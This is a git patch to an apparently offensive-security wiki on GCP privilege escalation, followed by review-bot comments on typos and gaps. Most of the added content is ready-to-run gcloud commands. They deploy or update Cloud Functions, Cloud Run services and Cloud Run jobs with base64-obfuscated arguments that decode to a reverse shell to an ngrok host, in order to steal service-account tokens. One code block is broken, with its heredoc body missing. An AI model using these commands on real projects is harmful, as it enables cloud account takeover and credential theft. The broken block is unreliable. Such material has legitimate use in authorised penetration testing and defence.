From 3a7140549eaf503bcff9594b0b1703760f979b7d Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 29 May 2024 10:45:04 +0000 Subject: [PATCH] GITBOOK-615: No subject --- .../gcp-cloudfunctions-privesc.md | 38 ++++++++++++++++++- .../gcp-run-privesc.md | 18 +++++++-- 2 files changed, 52 insertions(+), 4 deletions(-) diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md index 4dba7c386b..5941360959 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md @@ -34,6 +34,38 @@ Exploit scripts for this method can be found [here](https://github.com/RhinoSecu An attacker with these privileges can **modify the code of a Function and even modify the service account attached** with the goal of exfiltrating the token.\ Some privileges to trigger the function might be required. +```bash +# Create new code +temp_dir=$(mktemp -d) + +cat > $temp_dir/main.py < $temp_dir/requirements.txt + +zip -r $temp_dir/function.zip $temp_dir/main.py $temp_dir/requirements.txt + +# Update code +gcloud functions deploy \ + --runtime python312 \ + --trigger-http \ + --source $temp_dir \ + --entry-point main \ + --service-account @$PROJECT_ID.iam.gserviceaccount.com \ + --allow-unauthenticated + +# If you don't have permissions to change the IAM policy, the "--allow-unauthenticated" will just fail and do nothing + +# Get SA tokin calling the new function code +gcloud functions call +``` + The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py). ### `cloudfunctions.functions.sourceCodeSet` 
@@ -62,7 +94,11 @@ Only having **`cloudfunctions`** permissions, without **`iam.serviceAccounts.act ### Bucket Write Permissions -An attacker with **write permissions over the bucket** where the Cloud Functions code is stored will be able to **modify the code overwriting** the `function_code.zip` and will be able to **execute arbitrary** code once it's executed. +You might think that an attacker with **write permissions over the bucket** where the Cloud Functions code is stored will be able to **modify the code overwriting** the `function_code.zip` and then make the function **execute arbitrary** code. + +{% hint style="success" %} +**However, this isn't true, just overwriting the code inside the bucket won't modify the code that is being executed.** +{% endhint %} ## References diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md index 2267b72458..3c147ce5c0 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md @@ -36,12 +36,14 @@ Like the previous one but updating a service: ```bash gcloud run deploy hacked \ ---image=marketplace.gcr.io/google/ubuntu2004 \ +--image=ubuntu:latest \ --command=bash \ --args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \ --service-account="-compute@developer.gserviceaccount.com" \ --region=us-central1 \ --allow-unauthenticated + +# If you don't have permissions to use "--allow-unauthenticated", dont use it ``` ### `run.services.setIamPolicy` 
@@ -52,18 +54,28 @@ Give yourself previous permissions over cloud Run. Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/m-run.jobs.create.sh). +```bash +gcloud beta run jobs create jab-cloudrun-3326 \ +--image=ubuntu:latest \ +--command=bash \ +--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash" \ +--service-account="@$PROJECT_ID.iam.gserviceaccount.com" \ +--region=us-central1 + +``` + ### `run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`) Similar to the previous one it's possible to **update a job and update the SA**, the **command** and **execute it**: ```bash gcloud beta run jobs update hacked \ ---image=marketplace.gcr.io/google/ubuntu2004 \ +--image=mubuntu:latest \ --command=bash \ --args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \ --service-account=-compute@developer.gserviceaccount.com \ --region=us-central1 \ ---project=security-devbox --execute-now +--execute-now ``` ### `run.jobs.setIamPolicy`
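Review bot: in the `cloudfunctions.functions.update` hunk (gcp-cloudfunctions-privesc.md, `@@ -34,6 +34,38`), the line `cat > $temp_dir/main.py < $temp_dir/requirements.txt` has lost its heredoc: the function body and the requirements content that should be written are absent, so as written it redirects an empty or nonexistent requirements.txt into main.py and deploys an empty function. Restore the two write steps as proper heredocs (`cat > "$temp_dir/main.py" <<'EOF' ... EOF`, and likewise for requirements.txt) and quote `$temp_dir` throughout. Three further gaps in the same block: `gcloud functions deploy` and `gcloud functions call` are both missing the function-name positional argument; `--service-account @$PROJECT_ID.iam.gserviceaccount.com` has nothing before the `@` (use an explicit `<SA_NAME>` placeholder); and the `zip -r` step is dead weight, since `--source $temp_dir` deploys the directory and `function.zip` is never referenced (it would also store the absolute `$temp_dir` paths). Typo: "tokin" should be "token". The comment claiming that `--allow-unauthenticated` "will just fail and do nothing" without IAM policy rights is unsourced; verify it against the gcloud behaviour or soften it.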
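Review bot: the new hint in the "Bucket Write Permissions" hunk (`@@ -62,7 +94,11`) reverses the earlier statement but gives no reason, which leaves the reader unable to judge which version to trust; add one sentence on why overwriting `function_code.zip` does not change what runs (the function executes the build produced from the source at deploy time, so the bucket object is only consulted again on a later deploy; worth stating and verifying). That also makes the defensive takeaway precise: bucket write access is not a direct code-execution path, but the bucket remains part of the function's build supply chain and its write permissions still deserve to be restricted.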
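Review bot: `--image=ubuntu:latest` in the `run deploy` hunk (gcp-run-privesc.md, `@@ -36,12 +36,14`) replaces a registry-qualified image with a bare Docker Hub short name; confirm that gcloud and Cloud Run resolve the unqualified form, otherwise write it as `docker.io/library/ubuntu:latest` (or keep a registry-qualified reference) so the example is reproducible. The added comment `# If you don't have permissions to use "--allow-unauthenticated", dont use it` should read "don't", and it reads more clearly placed beside the flag it refers to rather than after the command.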
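Review bot: the fenced block added in the `run.jobs.create` hunk (`@@ -52,18 +54,28`) ends with a stray blank line before the closing fence and hard-codes a leftover job name, `jab-cloudrun-3326`, where the rest of the page uses the generic `hacked`; align the name and drop the blank line. The `--service-account="@$PROJECT_ID.iam.gserviceaccount.com"` value has nothing before the `@`; use an explicit `<SA_NAME>` placeholder so readers see it must be filled in. Two smaller points: `gcloud run jobs` no longer needs the `beta` track in current SDKs, and the prose says "Launch a job" while `run jobs create` only creates it, which is presumably why `run.jobs.run` is listed separately in the section that follows; a short clarification would avoid confusion.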
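Review bot: `--image=mubuntu:latest` in the `run.jobs.update` hunk (`@@ -52,18 +54,28`, second block) is a typo; the parallel change to the `run deploy` block in the same file uses `ubuntu:latest`, so this should match. Dropping `--project=security-devbox` is a good cleanup (it removes a real-looking project id from the docs), but `--service-account=-compute@developer.gserviceaccount.com` still has an empty project number before `-compute`; an explicit `<PROJECT_NUMBER>` placeholder would be consistent with the `$PROJECT_ID` convention used elsewhere in this patch.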